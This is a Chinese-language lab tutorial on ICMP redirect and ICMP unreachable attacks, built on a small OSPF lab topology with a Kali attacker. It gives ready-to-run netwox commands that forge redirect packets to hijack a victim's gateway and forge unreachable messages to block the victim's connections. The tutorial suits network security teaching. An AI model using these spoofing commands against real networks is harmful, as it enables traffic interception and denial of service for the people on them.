ICMP的重定向、不可達攻擊

ICMP重定向攻擊

ICMP重定向:

字面意思是重新定義方向,即處於一個網段設備A、B、C,A想要去C,卻把報文發給了B,B隨即告訴A,你直接去C,不用來我這裏

ICMP重定向攻擊:

僞造者僞裝成網關,就可以分配ICMP重定向後的方向

實驗環境如下:

 

實驗拓撲爲:

在攻擊之前,要保證PC1與PC2能通

R1 R2運行OSPF協議

 

測時:
PC1->PC2

攻擊者也要與目的地址相通,配置路由

# ip route add 10.1.1.0/24 via 192.168.211.222

測試:

 

實施攻擊:

思路:

  1. 僞造的是一個ICMP的重定向包
  2. 給被攻擊主機一個新的網關地址,以目前網關的名義發出

命令:

$ sudo netwox 86 -f "host 192.168.211.100" -g "192.168.211.130" -i  "192.168.211.254"

此時PC1 tracert PC2,在Kali上抓取ICMP的重定向報文,可見雖然是真實的網關發送的重定向報文,但是網關已經被更改爲Kali的地址

 

 

 

而沒有攻擊的時候,Kali是收不到重定向報文的


ICMP不可達攻擊

添加一個HTTP服務器,打開其80端口的服務

思路:

僞造一個ICMP不可達信息給受害主機

sudo netwox 82 -f "host 100.1.1.1 and port  80" -i "192.168.211.100"

 

另一種方法是將自己的網卡轉發功能關掉,然後進行ICMP欺騙攻擊,效果與ICMP不可達攻擊一樣,都是導致被攻擊主機不能ping通

"

sudo netwox 82 -f "host 10.1.1.1 " -i "192.168.211.100"


 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章